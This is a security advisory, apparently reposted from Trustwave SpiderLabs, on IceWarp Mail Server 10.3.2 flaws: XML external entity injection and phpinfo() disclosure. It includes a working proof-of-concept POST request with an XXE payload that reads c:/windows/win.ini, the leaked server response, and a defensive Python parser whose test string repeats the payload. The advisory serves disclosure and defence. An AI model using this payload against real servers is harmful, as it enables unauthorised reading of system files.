ugo22g

IceWarp Mail Server Injection / Information Disclosure

Sep 27th, 2011
Published: 2011-09-23
Version: 1.0

Vendor: IceWarp (http://www.icewarp.com)
Product: IceWarp Mail Server
Version affected: 10.3.2 and below

Product description: IceWarp WebMail is the web front-end for the IceWarp
Mail Server, which provides email access on over 50,000 servers. IceWarp
WebMail provides web-based access to email, calendars, contacts, files
and shared data from any computer with a browser and Internet connection.

Credit: David Kirkpatrick of Trustwave's SpiderLabs

Finding 1: XML External Entity Injection
CVE: CVE-2011-3579

An external entity is a feature of the XML specification which allows an XML
document to reference resources external to the document itself. When such an
entity is referenced, the application's XML parser is forced to access the
resource specified.

In this case it is possible to inject an XML DOCTYPE "SYSTEM" directive to
access local files on the operating system where the IceWarp server is
installed. Using this technique it is possible to retrieve files on the
operating system that are readable to the server. This attack can also be
used to create a denial of service condition.

Proof-of-Concept:

The following POST request was sent to the host A.B.C.D where the IceWarp
mail server was running:

REQUEST
=========
POST /-.._._.--.._1243848280/server/webmail.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D
Content-Length: 249
Content-Type: application/xml;charset=UTF-8
Pragma: no-cache
Cache-Control: no-cache

<!DOCTYPE foo [<!ENTITY xxeb91c4 SYSTEM "file:///c:/windows/win.ini"> ]><iq type="set"><query xmlns="webmail:iq:auth"><username>test&xxeb91c4;</username><digest>828cd27c6fb73ee32674602e9c5521f005c614f5fb9266fd071dab323b5079e02d47a421c01df2efffcd2bdb221e15bf2baa4acefe38f264d92d152878ca4d33</digest><method>RSA</method></query></iq>

RESPONSE:
==========
HTTP/1.1 200 OK
Server: IceWarp/9.4.2
Date: Wed, 20 Jul 2011 10:04:56 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/xml
Vary: Accept-Encoding
Content-Length: 1113

<?xml version="1.0" encoding="utf-8"?><iq type="error"><error
uid="login_invalid">test; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
....TRUNCATED

The above proof-of-concept would retrieve the c:\windows\win.ini file (the
response in this example has been truncated).

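The parser-side fix for this class of bug, as an added example that is not IceWarp's code (webmail.php is PHP; this is Python on the stdlib expat binding): a parser for the webmail:iq:auth login message that aborts on any DOCTYPE, entity declaration or external entity reference, so a body shaped like the advisory's payload is refused before any file is opened. The sample bodies and the digest values in them are constructed placeholders.

```python
import xml.parsers.expat

# Constructed sample bodies modelled on the advisory's webmail:iq:auth request.
SAFE_BODY = (
    '<iq type="set"><query xmlns="webmail:iq:auth">'
    '<username>test</username><digest>00ff</digest>'
    '<method>RSA</method></query></iq>'
)
XXE_BODY = (
    '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini"> ]>'
    '<iq type="set"><query xmlns="webmail:iq:auth">'
    '<username>test&xxe;</username><digest>00ff</digest>'
    '<method>RSA</method></query></iq>'
)


class UnsafeXml(Exception):
    """Body carries a DTD, entity declaration or external entity reference,
    none of which a login message has any reason to contain."""


def parse_auth_request(body):
    """Return the username/digest/method text fields of an <iq> auth body.

    Every DTD-related expat callback raises, which stops the parser; the
    exception propagates out of Parse() to the caller.
    """
    fields, current = {}, [None]

    def reject(*args):
        raise UnsafeXml("DTD or entity constructs are not permitted")

    def start(name, attrs):
        current[0] = name

    def end(name):
        current[0] = None

    def chars(data):
        if current[0] in ("username", "digest", "method"):
            fields[current[0]] = fields.get(current[0], "") + data

    p = xml.parsers.expat.ParserCreate()
    p.StartDoctypeDeclHandler = reject   # forbid <!DOCTYPE ...> outright
    p.EntityDeclHandler = reject         # forbid <!ENTITY ...>, internal or external
    p.ExternalEntityRefHandler = reject  # defence in depth: never fetch a SYSTEM id
    p.StartElementHandler = start
    p.EndElementHandler = end
    p.CharacterDataHandler = chars
    p.Parse(body, True)
    return fields


def is_rejected(body):
    """True when the hardened parser refuses the body."""
    try:
        parse_auth_request(body)
    except UnsafeXml:
        return True
    return False
```

In PHP itself the equivalent is to call libxml_disable_entity_loader(true) before loading untrusted XML and never to pass LIBXML_NOENT to DOMDocument or SimpleXML.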

Finding 2: PHP Information Disclosure
CVE: CVE-2011-3580

It is possible to retrieve the output of phpinfo() by accessing the URL
http://A.B.C.D/server, where A.B.C.D is the IP of the server running the
IceWarp software. The response is a page detailing the PHP version in use
and the PHP configuration settings, including system details.


Vendor Response: These issues have been addressed as of version 10.3.3

Remediation Steps: Customers should update to the latest version of IceWarp
Mail Server in order to address these issues. The above issues have been
corrected in version 10.3.3.

Revision History:
08/03/11 - Vulnerability disclosed
09/19/11 - Patch released
09/23/11 - Advisory published


About Trustwave: Trustwave is the leading provider of on-demand and
subscription-based information security and payment card industry
compliance management solutions to businesses and government entities
throughout the world. For organizations faced with today's challenging
data security and compliance environment, Trustwave provides a unique
approach with comprehensive solutions that include its flagship
TrustKeeper compliance management software and other proprietary security
solutions. Trustwave has helped thousands of organizations, ranging from
Fortune 500 businesses and large financial institutions to small and
medium-sized retailers, manage compliance and secure their network
infrastructure, data communications and critical information assets.
Trustwave is headquartered in Chicago with offices throughout North
America, South America, Europe, Africa, China and Australia.

About Trustwave's SpiderLabs: SpiderLabs is the advanced security team at
Trustwave responsible for incident response and forensics, ethical hacking
and application security tests for Trustwave's clients. SpiderLabs has
responded to hundreds of security incidents, performed thousands of ethical
hacking exercises and tested the security of hundreds of business
applications for Fortune 500 organizations. For more information visit
https://www.trustwave.com/spiderlabs

Disclaimer: The information provided in this advisory is provided "as is"
without warranty of any kind. Trustwave disclaims all warranties, either
express or implied, including the warranties of merchantability and fitness
for a particular purpose. In no event shall Trustwave or its suppliers be
liable for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.